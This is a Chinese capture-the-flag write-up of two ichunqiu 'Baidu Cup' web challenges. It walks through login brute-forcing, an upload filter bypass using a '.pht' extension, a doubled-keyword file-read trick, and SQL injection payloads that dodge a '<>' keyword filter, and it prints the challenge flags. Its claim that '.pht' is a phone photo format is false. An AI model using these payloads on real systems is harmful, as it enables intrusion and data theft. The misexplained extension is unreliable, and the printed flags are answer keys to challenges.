百度杯writeup

发表于 | 分类于 |

  百度杯有点难度啊,做了好久还是不会做,参考其他人做了几道。还有几道没有做,以后继续做做

一、123

http://3314e738918246a0bb89cd7d73b4000ad41ccb304b974710.game.ichunqiu.com/login.php
提示:12341234,然后就解开了

老规矩,先看看源代码有没有提示什么的,发现有提示啊

那么访问user.php看看,发现是一片空白,源代码也没有什么提示,想想临时文件试试,像~、bak等等,构造代码

http://3314e738918246a0bb89cd7d73b4000ad41ccb304b974710.game.ichunqiu.com/user.php.bak

可是竟然出现了405,显示被拦了。POST访问便可通过

发现临时文件全是一些用户名,登录界面没有任何限制,可以用buru进行爆破登录,根据上面源码提示进行爆破

我们先在1990里试试

爆破出用户名和密码:lixiuyun lixiuyun1990,继而登录

没有什么信息,又是查看源代码

发现上传地方被注释掉了,我们还原一下,得出上传页面上传,通过改后缀名为通过 a.jpg.pht得出

pht : 也是一种图片的格式,多数是由手机拍摄的

发现有一个view.php,继续跟进http://773e88c7e5d14ec1b93b571dcce597ba13ae6d4f98d44d86.game.ichunqiu.com/view.php
访问发现不在这,提示file?,继续进行各种测试,最后构造双flag得出
http://773e88c7e5d14ec1b93b571dcce597ba13ae6d4f98d44d86.game.ichunqiu.com/view.php?file=flaflagg

<?php 
echo 'flag is here';
'flag{94c0e93e-1cd1-4240-82bd-a13a6a06701f}-';
?>

二、注入

http://b6106ae09aa545d8b72a9ad59926e77bee2d261106ad44c8.game.ichunqiu.com/index.php?id=1

由burp抓包发现过滤<>构造:

http://b6106ae09aa545d8b72a9ad59926e77bee2d261106ad44c8.game.ichunqiu.com/index.php?id=1 o<>rder b<>y 3


http://b6106ae09aa545d8b72a9ad59926e77bee2d261106ad44c8.game.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,2,3


http://65c9963a9937461aadae1d39b40ff2bcb1bc9016780643b2.game.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,(se<>lect column_name fr<>om informat<>ion_schema.columns wh<>ere table_schema='sqli' an<>d table_name='info' lim<>it 2,1),3


http://65c9963a9937461aadae1d39b40ff2bcb1bc9016780643b2.game.ichunqiu.com/index.php?id=1 uni<>on se<>lect 1,(sel<>ect flAg_T5ZNdrm fr<>om info lim<>it 1),3

1、.接着用联合语句查看可显示字段:

php?id=1  un<>ion s<>elect 1,2,3

返回了一个2.说明第二个字段是可显示的。

2、.爆表名:

index.php?id=1  un<>ion s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

返回了info

3、爆字段名

/index.php?id=1  un<>ion s<>elect 1,gro<>up_con<>cat(column_name),3 from information_schema.columns where table_name=0x696e666f

table name后面的参数是0x加上刚才的info转为16进制。

这时发现又出现了405,说明加入的东西肯定有些事不能绕过防火墙的,同理,用<>绕过,

/index.php?id=1  un<>ion s<>elect 1,gro<>up_con<>cat(c<>olumn_name),3 from information_schema.colu<>mns wh<>ere table_name=0x696e666f

返回了id,title,flAg_T5ZNdrm三个字段。

4、爆字段flAg_T5ZNdrm里面的内容

index.php?id=1  un<>ion s<>elect 1,gro<>up_con<>cat(flAg_T5ZNdrm),3 from info

返回了flag。